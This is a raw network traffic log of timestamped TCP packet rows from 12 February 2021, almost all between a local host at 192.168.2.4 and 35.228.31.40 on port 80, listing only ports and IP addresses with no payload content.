Feb 12, 2021 01:50:13.442984104 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443012953 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443056107 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443070889 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443094015 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443134069 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443152905 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443172932 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443209887 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443232059 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443248987 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443286896 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443324089 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443337917 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443382978 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443398952 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443420887 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443459988 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443475962 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443509102 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443545103 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443583965 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443587065 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443624973 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443653107 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443661928 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443701029 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443722963 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443741083 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443789005 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443798065 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443833113 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443871021 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443891048 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443909883 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443948030 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.443968058 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.443985939 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.444044113 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.452205896 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.452260971 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.452296019 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.452326059 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.457375050 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457448006 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457453966 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.457492113 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457532883 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457552910 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.457572937 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457612038 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457638979 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.457648993 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457688093 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.457719088 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520245075 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520306110 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520345926 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520348072 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520389080 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520406961 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520427942 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520476103 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520483971 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520519972 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520561934 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520591974 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520601034 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520639896 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520663977 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520678043 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520716906 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520742893 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520755053 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520803928 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520823002 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520848989 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520885944 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520904064 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.520926952 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520966053 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.520998001 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521004915 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521044016 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521064043 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521084070 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521132946 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521140099 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521177053 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521215916 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521235943 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521255016 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521292925 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521316051 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521330118 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521368027 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521397114 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521471024 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521508932 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521533012 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521559000 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521601915 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521615982 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521639109 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521677017 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521696091 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521714926 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521752119 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521771908 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.521791935 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521831989 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.521847963 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.529172897 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.529231071 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.529261112 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.534133911 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.534214973 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538362980 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538408995 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538445950 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538464069 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538494110 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538538933 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538563013 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538578033 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538616896 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538640976 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538654089 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538692951 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538733006 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538738012 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538770914 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538793087 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538819075 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538861990 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538898945 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538899899 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538939953 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.538961887 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.538979053 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539016008 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539036989 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.539055109 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539092064 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539119005 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.539138079 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539180040 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539211988 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.539217949 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.539284945 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.577821970 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.577879906 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.577919006 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.577956915 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.577963114 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.577995062 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578027010 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578056097 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578087091 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578126907 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578157902 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578157902 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578190088 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578198910 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578227997 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578237057 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578277111 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578295946 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578316927 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578363895 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578373909 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578408957 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578445911 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578460932 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578485966 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578526020 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.578545094 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578586102 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.578598022 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.653453112 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.043767929 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.120819092 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.121635914 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.121726990 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.240390062 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743350029 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743424892 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743463039 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743503094 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743532896 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.743541002 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743562937 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.743590117 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743655920 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743695021 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743726015 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.743733883 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.743760109 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.743773937 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.744014978 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.820856094 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.820915937 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.820955038 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.820992947 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821022034 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821033955 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821069002 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821085930 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821130037 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821168900 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821170092 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821207047 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821228981 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821247101 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821285009 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821304083 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821324110 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821362972 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821379900 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821464062 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821516037 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821521997 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821557999 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821597099 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821614981 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821654081 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821693897 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821715117 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.821732044 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.821789980 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898504019 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898566961 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898607016 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898649931 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898689985 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898693085 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898734093 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898740053 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898782969 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898808002 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898823023 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898863077 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898879051 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898900986 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898940086 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.898963928 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.898977995 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899018049 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899035931 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899065971 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899110079 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899123907 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899148941 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899188042 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899204969 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899226904 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899265051 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899291039 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899302959 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899342060 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899359941 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899389029 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899432898 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899446011 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899471045 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899511099 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899532080 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899549007 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899586916 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899601936 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899626017 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899667978 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899687052 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899715900 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899759054 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899771929 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899795055 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899832964 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899847984 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899872065 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899909019 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899924040 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.899947882 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.899986029 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.900003910 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.900032997 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.900075912 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.900103092 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.900115013 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.900197983 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.900202036 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:14.977551937 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977616072 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977668047 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977708101 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977747917 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977794886 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977803946 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.977838993 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977838993 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.977845907 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.977876902 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977916002 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.977966070 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.977992058 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978029966 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978049994 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978070021 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978107929 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978125095 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978157997 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978200912 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978214025 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978239059 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978277922 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978296041 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978316069 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978353024 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978375912 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978391886 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978430033 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978450060 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978477001 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978521109 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978538990 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978558064 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978596926 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978615046 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978636026 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978674889 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978692055 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978713036 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978750944 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978769064 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978799105 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978833914 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978856087 CET	49774	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:14.978869915 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978909016 CET	80	49774	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:14.978925943 CET	49774	80	192.168.2.4	35.228.31.40
